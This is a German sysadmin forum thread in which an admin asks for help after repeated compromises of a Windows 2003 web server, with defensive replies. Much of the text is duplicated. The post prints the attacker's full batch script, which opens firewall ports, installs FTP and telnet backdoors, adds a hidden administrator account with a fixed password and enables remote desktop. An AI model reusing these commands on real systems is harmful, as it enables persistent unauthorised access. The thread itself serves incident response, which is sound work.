Server gehackt, bzw. manipuliert - finde die Lücke nicht!
Hallo Admins und ITler,
einer unserer Webserver wurde heute Abend schon wieder von fremder Hand manipuliert und missbraucht
Zum Glück haben die spät angefangen, somit sind nur 15 GB verbraucht worden, bis ich es gemerkt habe.
Es ist nun schon des öfteren passiert und leider immer auf die selbe Art:
In c:\windows\Temp liegt eine batchdatei, die anscheined ausgeführt wird und den Server richtig schön umkonfiguriert.
Ich habe die letzten Male alle enthaltenen Schritte rückgängig gemacht, aber eine Woche später war alles wieder verändert.
Wie beschrieben handelt es sich um einen Webserver (Windows 2003 Web Edition SP2 alle Updates installiert)
Auf den Ordner TEMP haben Admins Vollzugriff, Authentifizierte Benutzer Leserechte, Netzwerkdienst Dateischreib-, lese,- ausführrechte (ASP.NET) und System mit Vollzugriff.
Was kann ich tun, was habe ich übersehen, braucht Ihr mehr Infos?
Ich hoffe ich darf den Inhalt dieser Datei hier posten, sonst bitte sofort löschen und ich schicke den Inhalt per Mail an Interessierte.
@echo OFF
mkdir %windir%\system32\spool
mkdir %windir%\system32\spool\drivers
mkdir %windir%\system32\spool\drivers\w32x86
mkdir %windir%\system32\dllcache
mkdir %windir%\system32\config
mkdir %windir%\system32\spool\drivers\w32x86\ddemsn
mkdir %windir%\system32\PreInstall
mkdir %windir%\system32\PreInstall\IMAP
move iplist.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move psinfo.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move test.bat %windir%\system32\spool\drivers\w32x86\ddemsn
move uptime.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move secured.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move inf.ocx %windir%\system32
move localsrv.sav %windir%\system32\config
move jasfv.dll %windir%\system32\PreInstall\IMAP
move jasfv.ini %windir%\system32\PreInstall\IMAP
move ibcserv.exe %windir%\system32\PreInstall\IMAP
move imapservice.dll %windir%\system32\PreInstall\IMAP
move filter.ini %windir%\system32\PreInstall\IMAP
move filter.dll %windir%\system32\PreInstall\IMAP
move spooler.exe %windir%\system32\spool
::add firewall exceptions
echo Windows Registry Editor Version 5.00>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
regedit /s firewall.reg
del firewall.reg /Q
::start serv-u
%systemroot%\system32\PreInstall\IMAP\ibcserv.exe /i
::backdoor
start %windir%\system32\spool\spooler.exe
sca.exe config rpcapd displayname= "Imap Burn Control"
sca.exe description RAS "This service handles Imap Burn Controls sent by clients in your network. If this service is disabled, all services that depend on it, default: Remote Procedure Call (RPC), will fail to start. It is highly recommended to enable this service."
sca.exe config RpcSs depend= rpcapd
sca.exe config rpcapd error= ignore
sca.exe config rpcapd start= auto
sca.exe start rpcapd
::add/hide user
net1 user SUPPORT_27931a9 banana /add & Net1 Localgroup Administrators SUPPORT_27931a9 /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList t" /v SUPPORT_27931a9 /t REG_DWORD /d 0
echo REGEDIT4 >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg
echo "SUPPORT_27931a9"=dword:00000000 >> user.reg
regedit /s user.reg
del user.reg
::add backdoor
xnet.exe install Ntf /b:%windir%\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto
xnet.exe start Ntf
sca.exe start ntf
net start Ntf
::minor secure
sca.exe delete dntus26
sca.exe delete psexec
net share admin$ /del
net stop dntus26
net stop psexec
::enable TS
echo Windows Registry Editor Version 5.00 >> ts_on.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] >> ts_on.reg
echo "TSEnabled"=dword:00000001 >> ts_on.reg
echo "TSUserEnabled"=dword:00000001 >> ts_on.reg
echo "fAllowToGetHelp"=dword:00000001 >> ts_on.reg
echo "fDenyTSConnections"=dword:00000000 >> ts_on.reg
regedit.exe /s "ts_on.reg"
del /f ts_on.reg
attrib %windir%\system32\PreInstall\IMAP\jasfv.dll +h
attrib %windir%\system32\PreInstall\IMAP\jasfv.ini +h
attrib %windir%\system32\PreInstall\IMAP\ibcserv.exe +h
attrib %windir%\system32\PreInstall\IMAP\imapservice.dll +h
attrib %windir%\system32\PreInstall\IMAP\filter.ini +h
attrib %windir%\system32\PreInstall\IMAP\filter.dll +h
attrib %windir%\system32\Preinstall +h
attrib %windir%\system32\Preinstall\IMAP +h
attrib %windir%\system32\spool\spooler.exe +h
%windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del %windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del sca.exe
del xnet.exe
del 389742.bat
einer unserer Webserver wurde heute Abend schon wieder von fremder Hand manipuliert und missbraucht
Zum Glück haben die spät angefangen, somit sind nur 15 GB verbraucht worden, bis ich es gemerkt habe.
Es ist nun schon des öfteren passiert und leider immer auf die selbe Art:
In c:\windows\Temp liegt eine batchdatei, die anscheined ausgeführt wird und den Server richtig schön umkonfiguriert.
Ich habe die letzten Male alle enthaltenen Schritte rückgängig gemacht, aber eine Woche später war alles wieder verändert.
Wie beschrieben handelt es sich um einen Webserver (Windows 2003 Web Edition SP2 alle Updates installiert)
Auf den Ordner TEMP haben Admins Vollzugriff, Authentifizierte Benutzer Leserechte, Netzwerkdienst Dateischreib-, lese,- ausführrechte (ASP.NET) und System mit Vollzugriff.
Was kann ich tun, was habe ich übersehen, braucht Ihr mehr Infos?
Ich hoffe ich darf den Inhalt dieser Datei hier posten, sonst bitte sofort löschen und ich schicke den Inhalt per Mail an Interessierte.
@echo OFF
mkdir %windir%\system32\spool
mkdir %windir%\system32\spool\drivers
mkdir %windir%\system32\spool\drivers\w32x86
mkdir %windir%\system32\dllcache
mkdir %windir%\system32\config
mkdir %windir%\system32\spool\drivers\w32x86\ddemsn
mkdir %windir%\system32\PreInstall
mkdir %windir%\system32\PreInstall\IMAP
move iplist.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move psinfo.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move test.bat %windir%\system32\spool\drivers\w32x86\ddemsn
move uptime.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move secured.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move inf.ocx %windir%\system32
move localsrv.sav %windir%\system32\config
move jasfv.dll %windir%\system32\PreInstall\IMAP
move jasfv.ini %windir%\system32\PreInstall\IMAP
move ibcserv.exe %windir%\system32\PreInstall\IMAP
move imapservice.dll %windir%\system32\PreInstall\IMAP
move filter.ini %windir%\system32\PreInstall\IMAP
move filter.dll %windir%\system32\PreInstall\IMAP
move spooler.exe %windir%\system32\spool
::add firewall exceptions
echo Windows Registry Editor Version 5.00>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
regedit /s firewall.reg
del firewall.reg /Q
::start serv-u
%systemroot%\system32\PreInstall\IMAP\ibcserv.exe /i
::backdoor
start %windir%\system32\spool\spooler.exe
sca.exe config rpcapd displayname= "Imap Burn Control"
sca.exe description RAS "This service handles Imap Burn Controls sent by clients in your network. If this service is disabled, all services that depend on it, default: Remote Procedure Call (RPC), will fail to start. It is highly recommended to enable this service."
sca.exe config RpcSs depend= rpcapd
sca.exe config rpcapd error= ignore
sca.exe config rpcapd start= auto
sca.exe start rpcapd
::add/hide user
net1 user SUPPORT_27931a9 banana /add & Net1 Localgroup Administrators SUPPORT_27931a9 /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList t" /v SUPPORT_27931a9 /t REG_DWORD /d 0
echo REGEDIT4 >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg
echo "SUPPORT_27931a9"=dword:00000000 >> user.reg
regedit /s user.reg
del user.reg
::add backdoor
xnet.exe install Ntf /b:%windir%\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto
xnet.exe start Ntf
sca.exe start ntf
net start Ntf
::minor secure
sca.exe delete dntus26
sca.exe delete psexec
net share admin$ /del
net stop dntus26
net stop psexec
::enable TS
echo Windows Registry Editor Version 5.00 >> ts_on.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] >> ts_on.reg
echo "TSEnabled"=dword:00000001 >> ts_on.reg
echo "TSUserEnabled"=dword:00000001 >> ts_on.reg
echo "fAllowToGetHelp"=dword:00000001 >> ts_on.reg
echo "fDenyTSConnections"=dword:00000000 >> ts_on.reg
regedit.exe /s "ts_on.reg"
del /f ts_on.reg
attrib %windir%\system32\PreInstall\IMAP\jasfv.dll +h
attrib %windir%\system32\PreInstall\IMAP\jasfv.ini +h
attrib %windir%\system32\PreInstall\IMAP\ibcserv.exe +h
attrib %windir%\system32\PreInstall\IMAP\imapservice.dll +h
attrib %windir%\system32\PreInstall\IMAP\filter.ini +h
attrib %windir%\system32\PreInstall\IMAP\filter.dll +h
attrib %windir%\system32\Preinstall +h
attrib %windir%\system32\Preinstall\IMAP +h
attrib %windir%\system32\spool\spooler.exe +h
%windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del %windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del sca.exe
del xnet.exe
del 389742.bat
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 79819
Url: https://administrator.de/contentid/79819
Ausgedruckt am: 08.11.2024 um 17:11 Uhr
31 Kommentare
Neuester Kommentar
Wie immer $m server....
Denke mal du hast den IIS mit ASP drauf schau da mal in logbuch welche Zugriffe vorher statfnden und mit welchern Parametern deine Domains aufgerufen wurden dadruch köntes du es schon erkennen.
evtl kommen die uch durch ein Scrit auf dem Webserver drauf...
Dabei wähe gut zu wissen welche "Dienste" du alles laufen hast.
Welche Ports sind offen?
Laut den Schreiben nehme ich an das du diese komische winschrott firewall verwendest
Nimm mal eine andere dadurch sollten die es schonmal schwerer haben.
Wiso stells du nciht um auf Linux dann hättes du da paar Probleme weniger...
Denke mal du hast den IIS mit ASP drauf schau da mal in logbuch welche Zugriffe vorher statfnden und mit welchern Parametern deine Domains aufgerufen wurden dadruch köntes du es schon erkennen.
evtl kommen die uch durch ein Scrit auf dem Webserver drauf...
Dabei wähe gut zu wissen welche "Dienste" du alles laufen hast.
Welche Ports sind offen?
Laut den Schreiben nehme ich an das du diese komische winschrott firewall verwendest
Nimm mal eine andere dadurch sollten die es schonmal schwerer haben.
Wiso stells du nciht um auf Linux dann hättes du da paar Probleme weniger...
Ganz schön dickes Ding!
Ich würde mal zuerst an den Unsern / Admins schrauben. Standardbenutzernamen und Defaultkennwörter ändern und ersetzen.
In der Firewall (Hard- oder Softwarefirewall?) von außen alles erst mal dicht machen und vorerst nur die unbedingt benötigten Ports öffnen.
Firewall überwachen: Portscanns > 50 Ports pro Sekunde sind auffällig.
Log-Dateien kontrollieren, Eigenschaften der temporären Datei ansehen (wer hat die denn erstellt).
Blöder aber wirkungsvoller Trick: .reg-Dateien mit anderem Programm öffnen lassen (Paint,...)
Ich würde mal zuerst an den Unsern / Admins schrauben. Standardbenutzernamen und Defaultkennwörter ändern und ersetzen.
In der Firewall (Hard- oder Softwarefirewall?) von außen alles erst mal dicht machen und vorerst nur die unbedingt benötigten Ports öffnen.
Firewall überwachen: Portscanns > 50 Ports pro Sekunde sind auffällig.
Log-Dateien kontrollieren, Eigenschaften der temporären Datei ansehen (wer hat die denn erstellt).
Blöder aber wirkungsvoller Trick: .reg-Dateien mit anderem Programm öffnen lassen (Paint,...)
Ist der Server bei Ihnen Lokal oder handelt es sich um einen gemieteten in einem Rechenzentrum? Wenn letzteres: Ich hoffe es ist KEIN shared/virtual Server...
Da der Server Verbindung ins Internet würde ich den Einsatz einer entsprechenden Sicherheitslösung (AV + FW) für Server empfehlen. Alles andere wird nur "halbherzige" Eindringlinge abschrecken.
-DD
Da der Server Verbindung ins Internet würde ich den Einsatz einer entsprechenden Sicherheitslösung (AV + FW) für Server empfehlen. Alles andere wird nur "halbherzige" Eindringlinge abschrecken.
-DD
Blöder aber wirkungsvoller Trick:
.reg-Dateien mit anderem Programm öffnen
lassen (Paint,...)
.reg-Dateien mit anderem Programm öffnen
lassen (Paint,...)
Nöööö!!!!!!!!!!!
Schau mal in das Scriptkiddieskript rein:
regedit /s user.reg
regedit /s firewall.reg
regedit.exe /s "ts_on.reg"
Der startet das selber mit regedit.....(Wenn "kurzfristig" - dann Paintkopie in Regedit umbenennen)
Aber das wird auch nur 10 sekunden länger brauchen, das herauszufinden, bzw. wenn der "Autor" Google bedienen kann, dann wird er auch jede unserer Antowrten lesen und sich "wappnen"
Schau mal, wann diese Datei /(die du gepostet hast) erzeugt wurde und wer sich kurz vorher an dem System angemeldet hat (eventvwr)
Ich "tippe" darauf, das ausführrechte (ASP.NET) das Problem sind, werden die benötigt?
Welche FW würdest Du empfehlen?
Matt
Matt
http://www.sonicwall.com/de/
Oder jede andere Hardwarefirewall.
Merke,
Das System, das Du schützen willst, darf nie das System sein, wo die Firewall läuft!
dauerbatch:
cmd /c "net localgroup Administratoren" >irgendwohin-original.irgendwas
:dichkriegich
cmd /c "net localgroup Administratoren" >irgendwohin.irgendwas
fc /b irgendwohin.irgendwas irgendwohin-original.irgendwas
if %errorlevel% ==1 goto schonwiedereinneueradmin
if %errorlevel% ==0 goto end
:schonwiedereinneueradmin
echo "tja, alles, was ich hier schreiben würde, könnte auch derjenige lesen, den du da nicht haben willst. Vielleicht stoppt dieser Abschnitt einen Dienst, oder schickt per Bmail (das nicht unbedingt Bmal heissen muss) eine Mail, oder cmd / c netstat>weristaufdemsystem.irgendwas oder oder
:end
goto dichkriegich
Ps:
http://www.beyondlogic.org/solutions/cmdlinemail/cmdlinemail.htm
cmd /c "net localgroup Administratoren" >irgendwohin-original.irgendwas
:dichkriegich
cmd /c "net localgroup Administratoren" >irgendwohin.irgendwas
fc /b irgendwohin.irgendwas irgendwohin-original.irgendwas
if %errorlevel% ==1 goto schonwiedereinneueradmin
if %errorlevel% ==0 goto end
:schonwiedereinneueradmin
echo "tja, alles, was ich hier schreiben würde, könnte auch derjenige lesen, den du da nicht haben willst. Vielleicht stoppt dieser Abschnitt einen Dienst, oder schickt per Bmail (das nicht unbedingt Bmal heissen muss) eine Mail, oder cmd / c netstat>weristaufdemsystem.irgendwas oder oder
:end
goto dichkriegich
Ps:
http://www.beyondlogic.org/solutions/cmdlinemail/cmdlinemail.htm
Sorry, M$ Server im "Onlinebereich" ist nicht meine Baustelle.
"Wer" (benutzername) hat die Filme draufgestellt", und wann - was sagt das Eventlog um die Uhrzeit?
In den Script steht doch was von Backdoor, die sind immer noch auf dem System...
Hast Du immer noch diese Dienste am Laufen?
DHCP-Client - brauchst den ???
Drahtloskonfiguration dito??
Taskplaner???
Hilfe und Support - braucht keiner auf dem Server -oder doch
Windows Audio ????
Was hat es mit den beiden Firebird Diensten aufsich?
MYSQL und SQL sollen auf der Kiste laufen?
Die Links kennst du?
http://msdn2.microsoft.com/de-de/library/87x8e4d1(VS.80).aspx
http://msdn2.microsoft.com/de-de/library/ms178699(VS.80).aspx
http://msdn2.microsoft.com/de-de/library/ms178692(VS.80).aspx
"Wer" (benutzername) hat die Filme draufgestellt", und wann - was sagt das Eventlog um die Uhrzeit?
In den Script steht doch was von Backdoor, die sind immer noch auf dem System...
Hast Du immer noch diese Dienste am Laufen?
DHCP-Client - brauchst den ???
Drahtloskonfiguration dito??
Taskplaner???
Hilfe und Support - braucht keiner auf dem Server -oder doch
Windows Audio ????
Was hat es mit den beiden Firebird Diensten aufsich?
MYSQL und SQL sollen auf der Kiste laufen?
Die Links kennst du?
http://msdn2.microsoft.com/de-de/library/87x8e4d1(VS.80).aspx
http://msdn2.microsoft.com/de-de/library/ms178699(VS.80).aspx
http://msdn2.microsoft.com/de-de/library/ms178692(VS.80).aspx
Das System, das Du schützen willst,
darf nie das System sein, wo die Firewall
läuft!
Das halte ich für ein Gerücht. Sicherlich sollte schon im Netzwerk selbst eine entsprechende Firewall sein, jedoch ist dies kein Grund eine Firewall auf dem System selbst wegzulassen.
@15696:
Du schreibst, die Kiste wird "mitgescannt". Investiert das Geld für eine Server-AV-Lösung - Es lohnt sich definitiv. Ein "mitscannen" mag schön und Gut sein, aber nicht effektiv genug. Ich persönlich präferiere F-Secure und habe die Software auch auf meinem privatem Server laufen.
Hast du den Server mal mit einem vernünftigen Virenscanner auf Malware untersucht? Ich spreche jetzt von einem Scanner, der auch Rootkits erkennen kann und nicht nur auf Virendefinitionen fusst.
-DD
>
> Das System, das Du schützen
willst,
> darf nie das "einzige" System sein, wo die
Firewall
> läuft!
>
>
>
Das halte ich für ein Gerücht.
Sicherlich sollte schon im Netzwerk selbst
eine entsprechende Firewall sein, jedoch ist
dies kein Grund eine Firewall auf dem System
selbst wegzulassen.
.
-DD
> Das System, das Du schützen
willst,
> darf nie das "einzige" System sein, wo die
Firewall
> läuft!
>
>
>
Das halte ich für ein Gerücht.
Sicherlich sollte schon im Netzwerk selbst
eine entsprechende Firewall sein, jedoch ist
dies kein Grund eine Firewall auf dem System
selbst wegzulassen.
.
-DD
OK - habe den beanstanden Satz erweitert. - So ok?
"Zusätzlich" kann auf dem zu schützenden System eine Firewall drauf laufen, aber eine DMZ wird deswegen noch lange nicht daraus.
...TimoBeil hat Recht: die sind immer noch auf dem Server und reaktivieren sich über den Taskplaner selbst.
Ich würde die Kiste erstmal vom Netz nehmen und deren Skript in umgekehrter Reihenfolge! und negierten Befehlen abarbeiten. D.h., die verstekten Dateien wieder sichtbar machen, die Registry-Einträge editieren, das Backdoor schließen, deren User mit Admin-Rechten löschen, den Taskplaner killen, deren Server abschiessen, die angelegten Ordner säubern und löschen und die Ports schließen...
Danach mit o.g. Scannern und Logs den Angreifer ertappen...
Das klingt nach Arbeit
mfg telefix1
Ich würde die Kiste erstmal vom Netz nehmen und deren Skript in umgekehrter Reihenfolge! und negierten Befehlen abarbeiten. D.h., die verstekten Dateien wieder sichtbar machen, die Registry-Einträge editieren, das Backdoor schließen, deren User mit Admin-Rechten löschen, den Taskplaner killen, deren Server abschiessen, die angelegten Ordner säubern und löschen und die Ports schließen...
Danach mit o.g. Scannern und Logs den Angreifer ertappen...
Das klingt nach Arbeit
mfg telefix1
Probier mal in der CMD den Befehl "tasklist /v" und guck ob dort ein "Programm" auffällt was nicht dahingehört.
Aber da die wohl so immer reinkommen heißt es eigentlich für dich nur noch
Daten sichern
Server abschalten & ggfs. Neuinstallieren was evtl hilft(falls die Quelle nicht gefunden wurde)
Sonst ärgern die dich nacher so unmd schrotten dein System oder machen noch sons was damit und du hast die A-Karte dann...
Aber da die wohl so immer reinkommen heißt es eigentlich für dich nur noch
Daten sichern
Server abschalten & ggfs. Neuinstallieren was evtl hilft(falls die Quelle nicht gefunden wurde)
Sonst ärgern die dich nacher so unmd schrotten dein System oder machen noch sons was damit und du hast die A-Karte dann...
Hallo Kaiand1,
habe ich gemacht, da läuft nichts, was
nicht laufen sollte.
Bis jetzt war Ruhe, vielleicht hat das
rückwärts durcharbeiten der Batch
was gebracht.
Ich lass mich überraschen und halte
Euch auf dem laufenden
Gruß Matt
habe ich gemacht, da läuft nichts, was
nicht laufen sollte.
Bis jetzt war Ruhe, vielleicht hat das
rückwärts durcharbeiten der Batch
was gebracht.
Ich lass mich überraschen und halte
Euch auf dem laufenden
Gruß Matt
Hallo Matt,
ich habe mal als Admin für einen Webhoster gearbeitet.
Ich würde Dir den Tip geben, auch wenn derzeit nichts passiert, den Server mit einer neuen IP bzw. Domain (wenn es geht) neu aufzusetzen. Wenn es halbwegs professionelle waren, dann ist es in der Regel so, das beim betroffenen Server meist ein Hintertürchen offen gelassen wird.
Dann könnte es Dir passiert sein, das Dein Server in einer Wall of Fame gelistet ist...was anderen widerum anspornen wird die nächste Lücke zu finden.
LG Bino
also wie schon gesagt, legt ein Angreifer immer nen Backdoor an, beispielsweiße mit "netcat"
schau doch einfach mal deine Webanwendungen an, die auf dem Server laufen!
Wenn ich beispielsweiße ne Remote File Inclusion in einer Webpräsenz finde und dazu noch der "Secure Mode" auf OFF ist, hat mal vollen Zugriff auf das Dateisystem!!
schau doch einfach mal deine Webanwendungen an, die auf dem Server laufen!
Wenn ich beispielsweiße ne Remote File Inclusion in einer Webpräsenz finde und dazu noch der "Secure Mode" auf OFF ist, hat mal vollen Zugriff auf das Dateisystem!!
Wenn man den Server genauso wiederherstellt, wie er mal war (sei es durch Neuinstallation oder "Umkehren" der Batch-Befehle) hat man doch _garnichts_ gewonnen. Jedenfalls hört sich das meinem Gefühl nach nicht so an, als hätte jemand über eine inzwischen gepatchte OS-Lücke Zugang erhalten. Klingt eher wie eine unsicher programmierte Anwendung.
Ich würde alle Zugriffe protokollieren (Network Monitor:http://blogs.technet.com/netmon/) und Anzeige erstatten. Und ich sage es schon jetzt: trotzdem.
Hatte ich mal zu ISDN-Zeiten. War eine Rechnung über mehrere Tausend irgendwas (weiß nicht mehr ob DM oder schon Euro).
(mk)
